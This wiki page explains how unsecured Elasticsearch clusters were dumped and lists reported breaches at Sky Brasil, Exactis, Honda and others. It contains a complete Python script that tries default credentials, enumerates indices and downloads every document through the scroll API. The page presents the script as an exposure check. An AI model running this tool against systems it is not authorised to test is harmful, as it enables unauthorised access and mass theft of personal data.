Difference between revisions of «ElasticSearch data dumps»
From ingenio2010
Revision as of 14:46, 29 May 2025
Between 2019 and 2023 many companies put Elasticsearch into production without the security plugin (which at the time was not available without paying) and without putting a proxy in front of it to enforce authentication. With the administrative REST API reachable from the internet (sometimes even with default credentials such as elastic/elastic), numerous dumps followed. Note that since Elasticsearch 6.8/7.1 the basic security features (TLS and native authentication) ship in the free Basic licence, and from 8.0 they are enabled by default on a fresh install, so the "it costs money" excuse no longer holds. The pattern was almost always something like this:
- A bot or a human checks port 9200 on known DNS names or IPs to see whether Elasticsearch endpoints are listening
- If they are, it tries to access them without authentication; if that fails it tries elastic/elastic or similar credentials
- If that works, it runs commands to list the indices and then batch-downloads them
- If the attacker was a bot, it was most likely part of a web indexer (crawler) such as Shodan, and days later some curious person found the data and reported it
- In cases where the dumps were not tied to their source IP or DNS name it was sometimes hard to work out which company was affected, but there was almost always some piece of data that made the source of the dump unambiguous
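As an added example (not code from this wiki page nor from any of the researchers cited below), the following Python reproduces steps 1 to 3 of the pattern above over a pluggable HTTP transport, so it runs offline against a constructed fake node. The credential list, the fake node, the host addresses and the sample documents are assumptions; the endpoints it calls (`GET /`, `_cat/indices?format=json`, `_search?scroll=` and `_search/scroll`) are real Elasticsearch REST endpoints. Pointed at a host you are authorised to test via `urllib_transport`, it doubles as an exposure check: it reports a node as open, as open with a default credential, or as reachable but locked.

```python
"""Added example (not the wiki's code): the probe -> default creds -> index listing
-> scroll download pattern described above, over a pluggable transport. FakeCluster
is a constructed stand-in; nothing touches a real host unless you pass urllib_transport."""
import base64
import json
from urllib import error, request

# elastic/elastic is from the page; elastic/changeme was the X-Pack 5.x bootstrap
# password. Which pairs a given scanner tries is an assumption.
DEFAULT_CREDS = [("elastic", "elastic"), ("elastic", "changeme")]

def basic_auth(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}

def urllib_transport(url, headers=None, data=None):
    """Real transport -> (status, body); only for nodes you are authorised to test."""
    req = request.Request(url, data=data, headers=headers or {}, method="POST" if data else "GET")
    try:
        with request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except error.HTTPError as e:
        return e.code, e.read().decode()

def is_elastic(body):
    """GET / on a reachable node answers with cluster_name and a version block."""
    try:
        return {"cluster_name", "version"} <= set(json.loads(body))
    except (ValueError, TypeError):
        return False

def assess(base_url, transport):
    """Steps 1-2: is it Elasticsearch, and does it open with no auth or a default
    credential? headers=None means the node held."""
    status, body = transport(base_url + "/")
    if status == 200 and is_elastic(body):
        return {"elastic": True, "auth": "none", "headers": {}}
    if status == 401 and "security_exception" in body:
        for user, password in DEFAULT_CREDS:
            headers = basic_auth(user, password)
            status, body = transport(base_url + "/", headers=headers)
            if status == 200 and is_elastic(body):
                return {"elastic": True, "auth": f"default:{user}", "headers": headers}
        return {"elastic": True, "auth": "required", "headers": None}
    return {"elastic": False, "auth": None, "headers": None}

def list_indices(base_url, headers, transport):
    """Step 3a: _cat/indices lists every index with its document count (null for closed ones)."""
    status, body = transport(base_url + "/_cat/indices?format=json", headers=headers)
    return [(r["index"], int(r.get("docs.count") or 0)) for r in json.loads(body)] if status == 200 else []

def dump_index(base_url, index, headers, transport, page_size=2):
    """Step 3b: batch download through the scroll API until an empty page comes back."""
    hdrs = dict(headers, **{"Content-Type": "application/json"})
    body = json.dumps({"size": page_size, "query": {"match_all": {}}}).encode()
    status, text = transport(f"{base_url}/{index}/_search?scroll=1m", headers=hdrs, data=body)
    docs = []
    while status == 200:
        page = json.loads(text)
        if not page["hits"]["hits"]:
            break
        docs.extend(hit["_source"] for hit in page["hits"]["hits"])
        body = json.dumps({"scroll": "1m", "scroll_id": page["_scroll_id"]}).encode()
        status, text = transport(f"{base_url}/_search/scroll", headers=hdrs, data=body)
    return docs

def run_pattern(base_url, transport):
    """Steps 1-3 end to end; the dict is what an exposure report would hold."""
    report = assess(base_url, transport)
    if report["headers"] is None:
        return report
    report["indices"] = list_indices(base_url, report["headers"], transport)
    report["dumped"] = {name: len(dump_index(base_url, name, report["headers"], transport))
                        for name, _ in report["indices"]}
    return report

class FakeCluster:
    """Constructed offline node; password=None reproduces a node with no auth at all."""
    def __init__(self, indices, password=None):
        self.indices, self.password, self.scrolls = indices, password, {}

    def __call__(self, url, headers=None, data=None):
        path = "/" + url.split("://", 1)[1].split("/", 1)[1]
        want = basic_auth("elastic", self.password)["Authorization"] if self.password else None
        if want and (headers or {}).get("Authorization") != want:
            return 401, json.dumps({"error": {"type": "security_exception"}})
        if path == "/":
            return 200, json.dumps({"cluster_name": "prod", "version": {"number": "7.9.0"}})
        if path.startswith("/_cat/indices"):
            return 200, json.dumps([{"index": n, "docs.count": str(len(d))} for n, d in self.indices.items()])
        if path.endswith("/_search?scroll=1m"):  # first page; the scroll_id is just the index name here
            name, size = path[1:].split("/")[0], json.loads(data)["size"]
            self.scrolls[name] = (size, size)  # (next offset, page size)
            return 200, self._page(name, 0, size)
        if path == "/_search/scroll":
            name = json.loads(data)["scroll_id"]
            offset, size = self.scrolls[name]
            self.scrolls[name] = (offset + size, size)
            return 200, self._page(name, offset, size)
        return 404, "{}"

    def _page(self, name, offset, size):
        hits = [{"_source": d} for d in self.indices[name][offset:offset + size]]
        return json.dumps({"_scroll_id": name, "hits": {"hits": hits}})

# Constructed sample data; no real records.
SAMPLE_DOCS = [{"name": f"customer-{i}", "email": f"c{i}@example.invalid"} for i in range(5)]
OPEN_NODE = FakeCluster({"customers": SAMPLE_DOCS, "logs-2023": [{"msg": "boot"}]})
DEFAULT_CRED_NODE = FakeCluster({"customers": SAMPLE_DOCS}, password="elastic")
LOCKED_NODE = FakeCluster({"customers": SAMPLE_DOCS}, password="long-random-secret")
```

Run `run_pattern("http://10.0.0.5:9200", OPEN_NODE)` and the open node yields every document of every index; the node with the default credential yields the same after one extra request; the locked node is identified as Elasticsearch but returns no index list. The scroll loop is the relevant part for defenders: a single `_cat/indices` followed by a stream of `_search/scroll` calls from one client is exactly the traffic a reverse proxy in front of the cluster should be logging and, for unauthenticated clients, refusing.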
List of known companies that suffered data theft from ElasticSearch
Sky Brazil
As ElasticSearch based leaks become the latest source of massive data exposures, Sky Brasil, one of the biggest subscription television services in Brazil, is the latest to leave its customers exposed after not securing the server with a password. Independent researcher Fabio Castro found the firm exposed the data of 32 million subscribers in 28.7GB of log files and a 429.1GB of API data that revealed names, home addresses, phone numbers, birth dates, client IP address, payment methods, and encrypted passwords. "The data the server stored was Full name, e-mail, password, pay-TV package data (Sky Brazil), client ip addresses, personal addresses, payment methods," Castro told BleepingComputer. "Among other information the model of the device, serial numbers of the device that is in the customer's home, and also the log files of the whole platform." [1]
Data & Leads Inc (alleged)
An ElasticSearch server database containing the information of nearly 57 million U.S. residents was found to have been left exposed without a password. On November 20, 2018, Bob Diachenko, director of cyber risk research for Hacken, which also discovered the Kars4Kids leak, discovered the breach while conducting a security audit of publicly available servers with the Shodan search engine, according to a Nov. 28 blog post. The database was first indexed by Shodan on November 14, 2018 and contained information including first and last names, employers, job titles, email, addresses, state, zip codes, phone numbers, and IP addresses. Diachenko also reportedly discovered a second cached database named "Yellow Pages," which reportedly held an additional 25,917,820 records, which appeared to be business entries. While the source of the leak was not immediately identifiable, the structure of the field 'source' in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren't able to get in touch with their representatives. Moreover, shortly before this publication the Data & Leads website went offline and is now unavailable. [2]
Exactis
Wired reported that Night Lion Security founder Vinny Troia discovered the Exactis leak earlier this month. Troia wasn't specifically looking for a leak from the company; he was merely using the Shodan search tool to find ElasticSearch databases. Exactis' databases appeared in the results, and it wasn't protected by any firewall, so Troia was able to gain access to the company's records. Troia said the databases contained records for 230 million consumers and 110 million businesses, but those figures could change as Exactis responds to and eventually investigates the incident. Troia discovered this database on a lark with a quick search. What are the odds that people who make their livings peddling stolen information--or taking advantage of it to support more criminal activities--didn't find such a poorly safeguarded trove of personal data? That means a significant portion of the U.S. population (roughly 70 percent) likely had some of their records compromised because of Exactis. We might never know definitively if Troia was the first to discover these databases or merely the first to publicly disclose it. The good news is that Exactis doesn't appear to have leaked financial information, Social Security Numbers, or similar highly sensitive data. The information it does collect could still be used by scammers or other attackers, but it's not a direct threat to someone's financial health. Wired reported that Exactis secured the databases after Troia revealed the problem, which should mean it can't be accessed by anyone else. However, the company hasn't publicly acknowledged the incident, so we don't know exactly what precautions it's taken. [3]
Honda
On December 11th, 2019, I identified an open and unprotected Elasticsearch cluster with 976 million records which appeared to be part of Honda North America infrastructure, exposed online to anyone with a web browser. An estimated 1 million records* in the database contained information about Honda owners and their vehicles. No password or other authentication was needed to access the records, which included names, contact details, and vehicle information. [4]
References
[1] https://www.scworld.com/news/sky-brasil-one-of-the-biggest-subscription-television-services-in-brazil-is-the-latest-elasticsearch-server-user-to-leave-its-customers-exposed-after-not-securing-the-server-with-a-password
[2] https://hackenproof.com/blog/industry-news/new-data-breach-exposes-57-million-records
[3] https://www.tomshardware.com/news/exactis-data-breach-leak,37381.html
[4] https://securitydiscovery.com/honda-exposes-vehicle-owner-records-on-the-web/